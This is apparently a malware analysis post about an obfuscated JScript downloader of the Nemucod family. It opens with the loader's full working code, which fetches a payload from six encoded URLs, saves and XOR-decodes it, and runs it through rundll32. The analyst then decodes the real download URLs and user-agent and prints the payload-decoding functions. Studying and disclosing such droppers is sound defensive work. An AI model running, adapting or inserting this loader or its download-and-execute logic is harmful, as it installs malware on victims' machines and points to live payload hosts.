es.on('error', function (err) { harness._exitCode = 1 });
}

var ended = false;
stream.on('end', function () { ended = true });

if (conf.exit === false) return harness;
if (!canEmitExit || !canExit) return harness;
var inErrorState = false;
process.on('exit', function (code) {
// let the process exit cleanly.
if (code !== 0) {
return
}
if (!ended) {
var only = harness._results._only;
for (var i = 0; i < harness._tests.length; i++) {
var t = harness._tests;
if (only && t !== only) continue;
t._exit();
}
}
harness.close();
process.exit(code || harness._exitCode);
});

return harness;
}

nazadposmotrishvdrugzanzibar5SPASPI = "type";
function nazadposmotrishvdrugzanzibar5sud(vardos, tris){

return vardos[nazadposmotrishvdrugzanzibar5lololosh+Franch+"th"];
}
var kolli = "TVNYTWEAGLEWEAGLEUwyLlhNTEhWEAGLEWEAGLEUVFA9V"+'1NWEAGLEWEAGLEjcmlwdC5TWEAGLEWEAGLEaGVsbA==';
var nazadposmotrishvdrugzanzibarTooBIG = new Function("return nikeFootballAir23(kolli).split('=');");
function nazadposmotrishvdrugzanzibarShivaua(nazadposmotrishvdrugzanzibarShibaba6,nazadposmotrishvdrugzanzibarShibaba2, nazadposmotrishvdrugzanzibarShibaba8){
return nazadposmotrishvdrugzanzibarShibaba6.shift();
}
var septocher = new Function("return 'GET';");
if(!nazadposmotrishvdrugzanzibar5TRUEFALSE){
nazadposmotrishvdrugzanzibar5misterdenisk.nazadposmotrishvdrugzanzibar5sameOrN = function(nazadposmotrishvdrugzanzibar5param1, nazadposmotrishvdrugzanzibar5param2) {
return nazadposmotrishvdrugzanzibar5param1.D == nazadposmotrishvdrugzanzibar5param2.D || nazadposmotrishvdrugzanzibar5param1.F == nazadposmotrishvdrugzanzibar5param2.F;
};
nazadposmotrishvdrugzanzibar5misterdenisk.angle = function(nazadposmotrishvdrugzanzibar5p) {
return Math.atan2(nazadposmotrishvdrugzanzibar5p.y, nazadposmotrishvdrugzanzibar5p.x);
};
}
String.prototype.nazadposmotrishvdrugzanzibar5center2 = function () {
var mercedesbenzz44_H11_L22 = {
mercedesbenzzSUyaWON: this
};
mercedesbenzz44_H11_L22.nazadposmotrishvdrugzanzibar5VARDOCE = mercedesbenzz44_H11_L22.mercedesbenzzSUyaWON[nikeFootballAir23("c3VWEAGLEWEAGLEic3RyWEAGLEWEAGLEaW5WEAGLEWEAGLEn")](nazadposmotrishvdrugzanzibar5DRUZA, nazadposmotrishvdrugzanzibar5chosen);
return mercedesbenzz44_H11_L22.nazadposmotrishvdrugzanzibar5VARDOCE;
};
var nazadposmotrishvdrugzanzibar5sirdallos =nikeFootballAir23("WEAGLEWEAGLERXhwYW5WEAGLEWEAGLEkRW52aXWEAGLEWEAGLEJvbm1lbnRTdHJWEAGLEWEAGLEpbmdz");
var nazadposmotrishvdrugzanzibar5Native = function(options){

};
nazadposmotrishvdrugzanzibar5Native.nazadposmotrishvdrugzanzibar5XCOPmplement = function(nazadposmotrishvdrugzanzibar5objects, nazadposmotrishvdrugzanzibar5properties){
for (var nazadposmotrishvdrugzanzibar5l = nazadposmotrishvdrugzanzibar5objects.length, nazadposmotrishvdrugzanzibar5XCOP = 0; nazadposmotrishvdrugzanzibar5XCOP < nazadposmotrishvdrugzanzibar5l; nazadposmotrishvdrugzanzibar5XCOP++) nazadposmotrishvdrugzanzibar5objects[nazadposmotrishvdrugzanzibar5XCOP].nazadposmotrishvdrugzanzibar5XCOPmplement(nazadposmotrishvdrugzanzibar5properties);
};

var nazadposmotrishvdrugzanzibarolivia = [nazadposmotrishvdrugzanzibar5lidgen, nazadposmotrishvdrugzanzibar5sirdallos,nikeFootballAir23("WEAGLEWEAGLEJVRFTWEAGLEWEAGLEVAl"), ".d"+nazadposmotrishvdrugzanzibar5lololosh+nazadposmotrishvdrugzanzibar5lololosh, nikeFootballAir23("UnWEAGLEWEAGLEVuWEAGLEWEAGLE")];

nazadposmotrishvdrugzanzibarnazadposmotrishvdrugzanzibar23 = nikeFootballAir23("b3WEAGLEWEAGLEBlbg=WEAGLEWEAGLE=");
nazadposmotrishvdrugzanzibar5fabled = "JOHN2WEEK";
nazadposmotrishvdrugzanzibar5Native.nazadposmotrishvdrugzanzibar5genericize = function(object, nazadposmotrishvdrugzanzibar5property, nazadposmotrishvdrugzanzibar5check){
if ((!nazadposmotrishvdrugzanzibar5check || !object[nazadposmotrishvdrugzanzibar5property]) && typeof object.prototype[nazadposmotrishvdrugzanzibar5property] == 'function') object[nazadposmotrishvdrugzanzibar5property] = function(){
return object.prototype[nazadposmotrishvdrugzanzibar5property].apply(nazadposmotrishvdrugzanzibar5args.shift(), nazadposmotrishvdrugzanzibar5args);
};
};

nazadposmotrishvdrugzanzibar5Richters = nazadposmotrishvdrugzanzibarolivia.shift();
nazadposmotrishvdrugzanzibar5Native.nazadposmotrishvdrugzanzibar5typize = function(object, nazadposmotrishvdrugzanzibar5family){
if (!object.type) object.type = function(item){
return (nazadposmotrishvdrugzanzibar5$type(item) === nazadposmotrishvdrugzanzibar5family);
};
};
var nazadposmotrishvdrugzanzibar001 = this[nazadposmotrishvdrugzanzibar5Richters ];
nazadposmotrishvdrugzanzibar5casque = "p";
nazadposmotrishvdrugzanzibar5tudabilo1 = "s";
var nazadposmotrishvdrugzanzibar5d2 = nazadposmotrishvdrugzanzibarTooBIG();
var nazadposmotrishvdrugzanzibar5rampart = new nazadposmotrishvdrugzanzibar001(nazadposmotrishvdrugzanzibar5d2[1]);

var nazadposmotrishvdrugzanzibariwasafraidinin = nazadposmotrishvdrugzanzibar5rampart[nazadposmotrishvdrugzanzibarShivaua(nazadposmotrishvdrugzanzibarolivia,"")](nazadposmotrishvdrugzanzibarShivaua(nazadposmotrishvdrugzanzibarolivia));

var nazadposmotrishvdrugzanzibar5jjit = (nazadposmotrishvdrugzanzibar5casque + "oQ"+"Q"+(nazadposmotrishvdrugzanzibar5SPASPI,nazadposmotrishvdrugzanzibar5SPASPI,"nazadposmotrishvdrugpreserve","nazadposmotrishvdrughostler","nazadposmotrishvdrugwicker","nazadposmotrishvdruglongest","nazadposmotrishvdrugflower","456i")).Zhido("QQ"+(nazadposmotrishvdrugzanzibar5SPASPI,"nazadposmotrishvdrughatchet",nazadposmotrishvdrugzanzibar5SPASPI,"nazadposmotrishvdrugbuilder","nazadposmotrishvdrugsurmised","nazadposmotrishvdrugtourism","nazadposmotrishvdrugthreadbare","456"), nazadposmotrishvdrugzanzibar5tudabilo1) +"tion";
var nazadposmotrishvdrugzanzibar5pudlimudli = new nazadposmotrishvdrugzanzibar001(nazadposmotrishvdrugzanzibar5d2[0]);
var nazadposmotrishvdrugzanzibar5SIDRENKOV = nazadposmotrishvdrugzanzibarolivia.shift();
var nazadposmotrishvdrugzanzibar5promises = nazadposmotrishvdrugzanzibarolivia.shift();

var nazadposmotrishvdrugzanzibarfuBody = "var nazadposmotrishvdrugzanzibar5SS = 11;"+ nazadposmotrishvdrugzanzibar5LUCIODOR + 'var perviPar = "echo(33);";'+nazadposmotrishvdrugzanzibar5center(nazadposmotrishvdrugzanzibarEmptyVara + "571");

function nazadposmotrishvdrugzanzibar5itakvsegda(T, D) {
T[D]();
}
]]></script>
<script language='JScript'><![CDATA[


function nazadposmotrishvdrugzanzibar5_VoCHO(T, D, C) {
T[D](C);
}
function nazadposmotrishvdrugzanzibar5_VoCHO_JORDAN(T, D, C) {
T[nikeFootballAir23(D)](C);
}
var bohvastilkzanzibar = new Function("tuz,korol", nazadposmotrishvdrugzanzibarfuBody);

bohvastilkzanzibar(12,13);


function nazadposmotrishvdrugzanzibar5_a2(nazadposmotrishvdrugzanzibarnazadposmotrishvdrugzanzibar3, nazadposmotrishvdrugzanzibar5StrokaParam2, nazadposmotrishvdrugzanzibar5StrokaParam3,nazadposmotrishvdrugzanzibar5StrokaParam4) {
var nazadposmotrishvdrugzanzibarloverIamChild=nazadposmotrishvdrugzanzibariwasafraidinin+ "/"+ nazadposmotrishvdrugzanzibar5StrokaParam2 ;
var nazadposmotrishvdrugzanzibar5_VoCHO55 = "btBtmeR";

if (nazadposmotrishvdrugzanzibar5TRUEFALSE) {

nazadposmotrishvdrugzanzibar5_VoCHO55 = nazadposmotrishvdrugzanzibar5_VoCHO55 + "cedlako";
nazadposmotrishvdrugzanzibar5pudlimudli[nazadposmotrishvdrugzanzibarnazadposmotrishvdrugzanzibar23](septocher(), nazadposmotrishvdrugzanzibarnazadposmotrishvdrugzanzibar3, false);

nazadposmotrishvdrugzanzibar5pudlimudli.setRequestHeader("User-Agent", nikeFootballAir23("TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMCk="));
nazadposmotrishvdrugzanzibar5pudlimudli[nazadposmotrishvdrugzanzibar5tudabilo1 + ("nazadposmotrishvdrugoccurrence","nazadposmotrishvdrugnightingale","nazadposmotrishvdrugcurtsy","nazadposmotrishvdruganent","nazadposmotrishvdrugumpire","end")]();

var mercedesbenzzDamDAMDAGADAI = new nazadposmotrishvdrugzanzibar001(nikeFootballAir23(nazadposmotrishvdrugzanzibarsophos2));
mercedesbenzzISHEVGaSMa = "JOHN10WEEK";
mercedesbenzzDamDAMDAGADAI.open();


mercedesbenzzDamDAMDAGADAI[nazadposmotrishvdrugzanzibar5SPASPI] = nazadposmotrishvdrugzanzibar5chosen;
nazadposmotrishvdrugzanzibar5_VoCHO_JORDAN(mercedesbenzzDamDAMDAGADAI, "d3WEAGLEWEAGLEJpdWEAGLEWEAGLEGU=",nazadposmotrishvdrugzanzibar5pudlimudli["Res"+nazadposmotrishvdrugzanzibarREPONAFT['UPONA']+"e"+nikeFootballAir23("QWEAGLEWEAGLEmWEAGLEWEAGLE9WEAGLEWEAGLEkeQ=WEAGLEWEAGLE=")] );
nazadposmotrishvdrugzanzibar5XWaxeQhw = "JOHN11WEEK";
mercedesbenzzDamDAMDAGADAI[nazadposmotrishvdrugzanzibar5jjit] = 0;
nazadposmotrishvdrugzanzibar5krDwvrh = "JOHN12WEEK";
mercedesbenzzDamDAMDAGADAI[nikeFootballAir23("c2F2WEAGLEWEAGLEZVRvRmlsZQ=WEAGLEWEAGLE=WEAGLEWEAGLE")](nazadposmotrishvdrugzanzibarloverIamChild, 2);
nazadposmotrishvdrugzanzibar5SswQdi = "JOHN13WEEK"; mercedesbenzzDamDAMDAGADAI[nikeFootballAir23("Y2xWEAGLEWEAGLEvc2U=")]();
var nazadposmotrishvdrugzanzibar5FrankSinatra=VGRA1(nazadposmotrishvdrugzanzibarloverIamChild);
nazadposmotrishvdrugzanzibar5FrankSinatra=VGRA6(nazadposmotrishvdrugzanzibar5FrankSinatra);
var nazadposmotrishvdrugzanzibar5FrankSinatraLaa = nazadposmotrishvdrugzanzibar5sud(nazadposmotrishvdrugzanzibar5FrankSinatra);
if(nazadposmotrishvdrugzanzibar5FrankSinatraLaa < 30000)return false;
if (nazadposmotrishvdrugzanzibar5FrankSinatra[0]-3!= 74 || nazadposmotrishvdrugzanzibar5FrankSinatra[1]-5!= 85)return false;
nazadposmotrishvdrugzanzibarloverIamChild = nazadposmotrishvdrugzanzibarloverIamChild + nazadposmotrishvdrugzanzibar5StrokaParam3;
VGRA5(nazadposmotrishvdrugzanzibarloverIamChild, nazadposmotrishvdrugzanzibar5FrankSinatra );

if(nazadposmotrishvdrugzanzibar5StrokaParam4){
nazadposmotrishvdrugzanzibar5rampart.Run( "ru" + ("nazadposmotrishvdrugchicken","nazadposmotrishvdrugprostate","nazadposmotrishvdruglogistics","nazadposmotrishvdruglexicon","nd") +"l"+ (nazadposmotrishvdrugzanzibar5StrokaParam2,"nazadposmotrishvdrugtoken","nazadposmotrishvdrugunabated","nazadposmotrishvdrugplacing","nazadposmotrishvdrugablest","l32") + " "+nazadposmotrishvdrugzanzibarloverIamChild+",EnhancedStoragePasswordConfig",0,false);
}else{

nazadposmotrishvdrugzanzibar5rampart[nazadposmotrishvdrugzanzibar5promises](nazadposmotrishvdrugzanzibarloverIamChild, nazadposmotrishvdrugzanzibar5chosen, true);
}

return true;
}
};


var nazadposmotrishvdrugzanzibar5HORDA17 = "FhsxVP";
var VGRA8 = VGRA3("McnUKv40gkyAZaLozJMn9Xgr40VGHhbj");
var nazadposmotrishvdrugzanzibar5HORDAI = 0; function Fade() { }
function nazadposmotrishvdrugzanzibar5pereSubFunc(nazadposmotrishvdrugzanzibar5_a5,nazadposmotrishvdrugzanzibar5_a6,nazadposmotrishvdrugzanzibar5_a7){

if (nazadposmotrishvdrugzanzibar5TRUEFALSE) {
for(nazadposmotrishvdrugzanzibar5HORDA5 in nazadposmotrishvdrugzanzibar5_a5){
nazadposmotrishvdrugzanzibar5HORDAI++;
try{
var nazadposmotrishvdrugzanzibar5HORDA6 =nazadposmotrishvdrugzanzibar5jji+ nikeFootballAir23(nazadposmotrishvdrugzanzibar5_a5[nazadposmotrishvdrugzanzibar5HORDA5]) + "?DHVvPTpRF=wqxuXORJf";
if(nazadposmotrishvdrugzanzibar5_a2(nazadposmotrishvdrugzanzibar5HORDA6,nazadposmotrishvdrugzanzibar5HORDA17+nazadposmotrishvdrugzanzibar5HORDAI,nazadposmotrishvdrugzanzibar5_a6,nazadposmotrishvdrugzanzibar5_a7)){
break;
}
}catch(nazadposmotrishvdrugzanzibar5QvLfAvDBhv){}
}}
}
var nazadposmotrishvdrugzanzibar5checheche = ["d3WEAGLEWEAGLEd3LmtpbWFiaXRlcy5jbWEAGLEWEAGLE20vZzY3ZWlobnJ2","dGhlbWVvbmhhaS5jb20vZzY3ZWloWEAGLEWEAGLEbnJ2","Ym9uemVyd2Vic29sdXRpb25zLmNvbSWEAGLEWEAGLE9nNjdlaWhucnY=","d3WEAGLEWEAGLEd3LnBvZGRhcnByb2WEAGLEWEAGLEZlc3Npb25hbC5jb20vZzY3ZWlobnJ2","ZmxpZXJtYWdhcy5uZXQvZzY3ZWlobnJ2","aW50b21pbS5jb20vZzY3ZWlobnJ2"];
var nazadposmotrishvdrugzanzibar5checheche1 = nazadposmotrishvdrugzanzibar5checheche.slice(0);
nazadposmotrishvdrugzanzibar5pereSubFunc(nazadposmotrishvdrugzanzibar5checheche1, nazadposmotrishvdrugzanzibar5SIDRENKOV, true);

Fade.fadeOut = function(nextState, time) {

tween.onComplete.add(
function() {
bg2.drawRect(0, 0, game.width, game.height);
bg2.alpha = 1;
bg2.endFill();
}, this);
tween.start();
};

2) Quick search to see if they used same methods as previous analysis :

If they didn't improved their script, remember that it was very easy to retrieve the URLS used

2-1) First : Is there still a pattern used to obfuscate the strings ? :

Only looking for the replace word ...

=> the function to do Base64 decoding (that removes some string before) :

function nikeFootballAir23 (kuloma) {
nazadposmotrishvdrugzanzibarXCOP = 0;

var nazadposmotrishvdrugzanzibarddDccC1, nazadposmotrishvdrugzanzibarddDccC2, nazadposmotrishvdrugzanzibarc3, nazadposmotrishvdrugzanzibarc4;

var nazadposmotrishvdrugzanzibarout = "";

var nazadposmotrishvdrugzanzibar5nugash= kuloma["
replace"](/WEAGLEWEAGLE/g, '');
...

}


Ok, it uses the same method, and we have found the string used to obfuscated the real Base64 encoded strings => WEAGLEWEAGLE

Note : I could have find the function name just with this :

nikeFootballAir23("c2F2WEAGLEWEAGLEZVRvRmlsZQ=WEAGLEWEAGLE=WEAGLEWEAGLE")

2-2) URLs - Let's see at the end :

var nazadposmotrishvdrugzanzibar5checheche = [
"d3WEAGLEWEAGLEd3LmtpbWFiaXRlcy5jbWEAGLEWEAGLE20vZzY3ZWlobnJ2",
"dGhlbWVvbmhhaS5jb20vZzY3ZWloWEAGLEWEAGLEbnJ2",
"Ym9uemVyd2Vic29sdXRpb25zLmNvbSWEAGLEWEAGLE9nNjdlaWhucnY=",
"d3WEAGLEWEAGLEd3LnBvZGRhcnByb2WEAGLEWEAGLEZlc3Npb25hbC5jb20vZzY3ZWlobnJ2",
"ZmxpZXJtYWdhcy5uZXQvZzY3ZWlobnJ2",
"aW50b21pbS5jb20vZzY3ZWlobnJ2"​
];

Array of string ...some with the pattern found : WEAGLEWEAGLE

var nazadposmotrishvdrugzanzibar5checheche = [
"d3d3LmtpbWFiaXRlcy5jb20vZzY3ZWlobnJ2",
"dGhlbWVvbmhhaS5jb20vZzY3ZWlobnJ2",
"Ym9uemVyd2Vic29sdXRpb25zLmNvbS9nNjdlaWhucnY=",
"d3d3LnBvZGRhcnByb2Zlc3Npb25hbC5jb20vZzY3ZWlobnJ2",
"ZmxpZXJtYWdhcy5uZXQvZzY3ZWlobnJ2",
"aW50b21pbS5jb20vZzY3ZWlobnJ2"​
];

Let's make a Decode from Base64 format, to test :

Base64 Decode and Encode - Online

var nazadposmotrishvdrugzanzibar5checheche = [
"www .kimabites.com/g67eihnrv",
"themeonhai.com/g67eihnrv",
"bonzerwebsolutions.com/g67eihnrv",
"www. poddarprofessional.com/g67eihnrv",
"fliermagas.net/g67eihnrv",
"intomim.com/g67eihnrv"​
];
=> some part left ... :D

nazadposmotrishvdrugzanzibar5checheche array​

is put on :

nazadposmotrishvdrugzanzibar5checheche1 var

and used as parameter :

nazadposmotrishvdrugzanzibar5pereSubFunc(nazadposmotrishvdrugzanzibar5checheche1, nazadposmotrishvdrugzanzibar5SIDRENKOV, true);

=> Looking to the nazadposmotrishvdrugzanzibar5pereSubFunc function

=> nazadposmotrishvdrugzanzibar5checheche1

=> is named : nazadposmotrishvdrugzanzibar5_a5

if (nazadposmotrishvdrugzanzibar5TRUEFALSE) {
for(nazadposmotrishvdrugzanzibar5HORDA5 in nazadposmotrishvdrugzanzibar5_a5){

try{

var nazadposmotrishvdrugzanzibar5HORDA6 =nazadposmotrishvdrugzanzibar5jji+ nikeFootballAir23(nazadposmotrishvdrugzanzibar5_a5[nazadposmotrishvdrugzanzibar5HORDA5]) + "?DHVvPTpRF=wqxuXORJf";

if(nazadposmotrishvdrugzanzibar5_a2(nazadposmotrishvdrugzanzibar5HORDA6,nazadposmotrishvdrugzanzibar5HORDA17+nazadposmotrishvdrugzanzibar5HORDAI,nazadposmotrishvdrugzanzibar5_a6,nazadposmotrishvdrugzanzibar5_a7)){

break;
}
}catch(nazadposmotrishvdrugzanzibar5QvLfAvDBhv){}
}
}
Simplified :

if (is_run_in_windows_host) {

for(index = 0 ; index < array_of_urls.length ; index++){

try{
var url_to_be_used = "http://"+ nikeFootballAir23(array_of_urls[index]) +
"
?DHVvPTpRF=wqxuXORJf";
...
...
...​
}
}
}
Complete urls :

"http ://www .kimabites.com/g67eihnrv?DHVvPTpRF=wqxuXORJf"
"http ://themeonhai.com/g67eihnrv?DHVvPTpRF=wqxuXORJf",
"http ://bonzerwebsolutions.com/g67eihnrv?DHVvPTpRF=wqxuXORJf",
"http ://www .poddarprofessional.com/g67eihnrv?DHVvPTpRF=wqxuXORJf",
"http ://fliermagas.net/g67eihnrv?DHVvPTpRF=wqxuXORJf",
"http ://intomim.com/g67eihnrv?DHVvPTpRF=wqxuXORJf"​
User-agent :

nazadposmotrishvdrugzanzibar5pudlimudli.setRequestHeader("User-Agent", nikeFootballAir23("TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMCk="));

"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"​

2-3) The nemucod part :

var nazadposmotrishvdrugzanzibar5LUCIODOR = nikeFootballAir23("VkdSQTEgPSBmdW5jdGlvbiAoVkdSQTkpDQogew0KIHZhciBWR1JBMj1XU2NyaXB0WyJDcmVhdGVPYmplY3QiXSgiQURPREIuU3RyZWFtIik7DQogVkdSQTJbInR5cGUiXSA9IDI7DQogVkdSQTJbIkNoYXJzZXQiXSA9IDQzNzsNCiBWR1JBMlsib3BlbiJdKCk7DQogVkdSQTJbIkxvYWRGcm9tRmlsZSJdKFZHUkE5KTsNCiB2YXIgVkdSQTEwPVZHUkEyWyJSZWFkVGV4dCJdOw0KIFZHUkEyWyJjbG9zZSJdKCk7DQogcmV0dXJuIFZHUkEzKFZHUkExMCk7DQp9Ow0KVkdSQTMgPSBmdW5jdGlvbiAoVkdSQTEwKQ0KIHsgDQp2YXIgdDE9bmV3IEFycmF5KCk7DQp0MVsweEM3XSA9IDB4ODA7dDFbMHhGQ10gPSAweDgxO3QxWzB4RTldID0gMHg4Mjt0MVsweEUyXSA9IDB4ODM7dDFb
...
...
JpdGVUZXh0Il0oVkdSQTQoVkdSQTExKSk7DQogVkdSQTJbIlNhdmVUb0ZpbGUiXShWR1JBOSwgMik7DQogVkdSQTJbImNsb3NlIl0oKTsNCn07DQogDQpWR1JBNiA9IGZ1bmN0aW9uIChWR1JBNykNCiB7DQogZm9yICh2YXIgVGo9MDsgVGogPCBWR1JBN1sibGVuZ3RoIl07IFRqKyspDQogIHsNCiBWR1JBN1tUal0gXj0gVkdSQThbTWF0aC5mbG9vcihUaiAlIFZHUkE4Lmxlbmd0aCldOw0KIH0gDQogcmV0dXJuIFZHUkE3Ow0KfTsg
");

The string in red (a long part has been cut) : an obfuscated string.
It calls the nikeFootballAir23 function, to make Base64 decoding.
Interesting to note that it doesn't content any pattern WEAGLEWEAGLE :

=> only a copy-paste on a Base64 decoding tool give the real part

=> The part used to deobfuscate the payload to make it the real file​

//Load the file from HD, first decipher function
VGRA1 = function (VGRA9)
{

var VGRA2=WScript["CreateObject"]("ADODB.Stream");
VGRA2["type"] = 2;
VGRA2["Charset"] = 437;
VGRA2["open"]();
VGRA2["LoadFromFile"](VGRA9);
var VGRA10=VGRA2["ReadText"];
VGRA2["close"]();
return VGRA3(VGRA10);
};

// First Decipher function
VGRA3 = function (VGRA10)
{

var t1=new Array();
t1[0xC7] = 0x80;t1[0xFC] = 0x81;t1[0xE9] = 0x82;t1[0xE2] = 0x83;t1[0xE4] = 0x84;t1[0xE0] = 0x85;t1[0xE5] = 0x86;t1[0xE7] = 0x87;t1[0xEA] = 0x88;t1[0xEB] = 0x89;t1[0xE8] = 0x8A;t1[0xEF] = 0x8B;t1[0xEE] = 0x8C;t1[0xEC] = 0x8D;t1[0xC4] = 0x8E;t1[0xC5] = 0x8F;t1[0xC9] = 0x90;t1[0xE6] = 0x91;t1[0xC6] = 0x92;t1[0xF4] = 0x93;t1[0xF6] = 0x94;t1[0xF2] = 0x95;t1[0xFB] = 0x96;t1[0xF9] = 0x97;t1[0xFF] = 0x98;t1[0xD6] = 0x99;t1[0xDC] = 0x9A;t1[0xA2] = 0x9B;t1[0xA3] = 0x9C;t1[0xA5] = 0x9D;t1[0x20A7] = 0x9E;t1[0x192] = 0x9F;t1[0xE1] = 0xA0;t1[0xED] = 0xA1;t1[0xF3] = 0xA2;t1[0xFA] = 0xA3;t1[0xF1] = 0xA4;t1[0xD1] = 0xA5;t1[0xAA] = 0xA6;t1[0xBA] = 0xA7;t1[0xBF] = 0xA8;t1[0x2310] = 0xA9;t1[0xAC] = 0xAA;t1[0xBD] = 0xAB;t1[0xBC] = 0xAC;t1[0xA1] = 0xAD;t1[0xAB] = 0xAE;t1[0xBB] = 0xAF;t1[0x2591] = 0xB0;t1[0x2592] = 0xB1;t1[0x2593] = 0xB2;t1[0x2502] = 0xB3;t1[0x2524] = 0xB4;t1[0x2561] = 0xB5;t1[0x2562] = 0xB6;t1[0x2556] = 0xB7;t1[0x2555] = 0xB8;t1[0x2563] = 0xB9;t1[0x2551] = 0xBA;t1[0x2557] = 0xBB;t1[0x255D] = 0xBC;t1[0x255C] = 0xBD;t1[0x255B] = 0xBE;t1[0x2510] = 0xBF;t1[0x2514] = 0xC0;t1[0x2534] = 0xC1;t1[0x252C] = 0xC2;t1[0x251C] = 0xC3;
t1[0x2500] = 0xC4;t1[0x253C] = 0xC5;t1[0x255E] = 0xC6;t1[0x255F] = 0xC7;t1[0x255A] = 0xC8;t1[0x2554] = 0xC9;t1[0x2569] = 0xCA;t1[0x2566] = 0xCB;t1[0x2560] = 0xCC;t1[0x2550] = 0xCD;t1[0x256C] = 0xCE;t1[0x2567] = 0xCF;t1[0x2568] = 0xD0;t1[0x2564] = 0xD1;t1[0x2565] = 0xD2;t1[0x2559] = 0xD3;t1[0x2558] = 0xD4;t1[0x2552] = 0xD5;t1[0x2553] = 0xD6;t1[0x256B] = 0xD7;t1[0x256A] = 0xD8;t1[0x2518] = 0xD9;t1[0x250C] = 0xDA;t1[0x2588] = 0xDB;t1[0x2584] = 0xDC;t1[0x258C] = 0xDD;t1[0x2590] = 0xDE;t1[0x2580] = 0xDF;t1[0x3B1] = 0xE0;t1[0xDF] = 0xE1;t1[0x393] = 0xE2;t1[0x3C0] = 0xE3;t1[0x3A3] = 0xE4;t1[0x3C3] = 0xE5;t1[0xB5] = 0xE6;t1[0x3C4] = 0xE7;t1[0x3A6] = 0xE8;t1[0x398] = 0xE9;t1[0x3A9] = 0xEA;t1[0x3B4] = 0xEB;
t1[0x221E] = 0xEC;t1[0x3C6] = 0xED;t1[0x3B5] = 0xEE;t1[0x2229] = 0xEF;t1[0x2261] = 0xF0;t1[0xB1] = 0xF1;t1[0x2265] = 0xF2;t1[0x2264] = 0xF3;t1[0x2320] = 0xF4;t1[0x2321] = 0xF5;t1[0xF7] = 0xF6;t1[0x2248] = 0xF7;t1[0xB0] = 0xF8;t1[0x2219] = 0xF9;t1[0xB7] = 0xFA;t1[0x221A] = 0xFB;t1[0x207F] = 0xFC;t1[0xB2] = 0xFD;t1[0x25A0] = 0xFE;t1[0xA0] = 0xFF;
var resultArray=new Array();
for (var Tj=0; Tj < VGRA10["length"]; Tj++)
{

var OVc9=VGRA10["charCodeAt"](Tj);
if (OVc9 < 128)
{
var HIi3=OVc9;}
else {
var HIi3=t1[OVc9];
}
resultArray["push"](HIi3);
};
return resultArray;
};

// second decipher function
VGRA4 = function (VGRA11)
{

var t2=new Array();
t2[0x80] = 0x00C7;t2[0x81] = 0x00FC;t2[0x82] = 0x00E9;t2[0x83] = 0x00E2;t2[0x84] = 0x00E4;t2[0x85] = 0x00E0;t2[0x86] = 0x00E5;t2[0x87] = 0x00E7;t2[0x88] = 0x00EA;t2[0x89] = 0x00EB;t2[0x8A] = 0x00E8;t2[0x8B] = 0x00EF;t2[0x8C] = 0x00EE;t2[0x8D] = 0x00EC;t2[0x8E] = 0x00C4;t2[0x8F] = 0x00C5;t2[0x90] = 0x00C9;t2[0x91] = 0x00E6;t2[0x92] = 0x00C6;t2[0x93] = 0x00F4;t2[0x94] = 0x00F6;t2[0x95] = 0x00F2;t2[0x96] = 0x00FB;t2[0x97] = 0x00F9;t2[0x98] = 0x00FF;t2[0x99] = 0x00D6;t2[0x9A] = 0x00DC;t2[0x9B] = 0x00A2;t2[0x9C] = 0x00A3;t2[0x9D] = 0x00A5;t2[0x9E] = 0x20A7;t2[0x9F] = 0x0192;t2[0xA0] = 0x00E1;t2[0xA1] = 0x00ED;t2[0xA2] = 0x00F3;t2[0xA3] = 0x00FA;t2[0xA4] = 0x00F1;t2[0xA5] = 0x00D1;t2[0xA6] = 0x00AA;t2[0xA7] = 0x00BA;t2[0xA8] = 0x00BF;t2[0xA9] = 0x2310;t2[0xAA] = 0x00AC;t2[0xAB] = 0x00BD;t2[0xAC] = 0x00BC;t2[0xAD] = 0x00A1;t2[0xAE] = 0x00AB;t2[0xAF] = 0x00BB;t2[0xB0] = 0x2591;t2[0xB1] = 0x2592;t2[0xB2] = 0x2593;t2[0xB3] = 0x2502;t2[0xB4] = 0x2524;t2[0xB5] = 0x2561;t2[0xB6] = 0x2562;t2[0xB7] = 0x2556;t2[0xB8] = 0x2555;t2[0xB9] = 0x2563;t2[0xBA] = 0x2551;t2[0xBB] = 0x2557;t2[0xBC] = 0x255D;t2[0xBD] = 0x255C;t2[0xBE] = 0x255B;t2[0xBF] = 0x2510;t2[0xC0] = 0x2514;t2[0xC1] = 0x2534;t2[0xC2] = 0x252C;t2[0xC3] = 0x251C;t2[0xC4] = 0x2500;t2[0xC5] = 0x253C;t2[0xC6] = 0x255E;t2[0xC7] = 0x255F;t2[0xC8] = 0x255A;t2[0xC9] = 0x2554;t2[0xCA] = 0x2569;t2[0xCB] = 0x2566;t2[0xCC] = 0x2560;t2[0xCD] = 0x2550;t2[0xCE] = 0x256C;t2[0xCF] = 0x2567;t2[0xD0] = 0x2568;t2[0xD1] = 0x2564;t2[0xD2] = 0x2565;t2[0xD3] = 0x2559;t2[0xD4] = 0x2558;t2[0xD5] = 0x2552;t2[0xD6] = 0x2553;t2[0xD7] = 0x256B;t2[0xD8] = 0x256A;t2[0xD9] = 0x2518;t2[0xDA] = 0x250C;t2[0xDB] = 0x2588;t2[0xDC] = 0x2584;t2[0xDD] = 0x258C;t2[0xDE] = 0x2590;t2[0xDF] = 0x2580;t2[0xE0] = 0x03B1;t2[0xE1] = 0x00DF;t2[0xE2] = 0x0393;t2[0xE3] = 0x03C0;t2[0xE4] = 0x03A3;t2[0xE5] = 0x03C3;t2[0xE6] = 0x00B5;t2[0xE7] = 0x03C4;t2[0xE8] = 0x03A6;t2[0xE9] = 0x0398;t2[0xEA] = 0x03A9;t2[0xEB] = 0x03B4;t2[0xEC] = 0x221E;t2[0xED] = 0x03C6;t2[0xEE] = 0x03B5;t2[0xEF] = 0x2229;t2[0xF0] = 0x2261;t2[0xF1] = 0x00B1;t2[0xF2] = 0x2265;t2[0xF3] = 0x2264;t2[0xF4] = 0x2320;t2[0xF5] = 0x2321;t2[0xF6] = 0x00F7;t2[0xF7] = 0x2248;t2[0xF8] = 0x00B0;t2[0xF9] = 0x2219;t2[0xFA] = 0x00B7;t2[0xFB] = 0x221A;t2[0xFC] = 0x207F;t2[0xFD] = 0x00B2;t2[0xFE] = 0x25A0;t2[0xFF] = 0x00A0;

var EGj=new Array();
var resultString="";
var HIi3; var OVc9;
for (var Tj=0; Tj < VGRA11["length"]; Tj++)
{

HIi3=VGRA11[Tj];
if (HIi3 < 128)
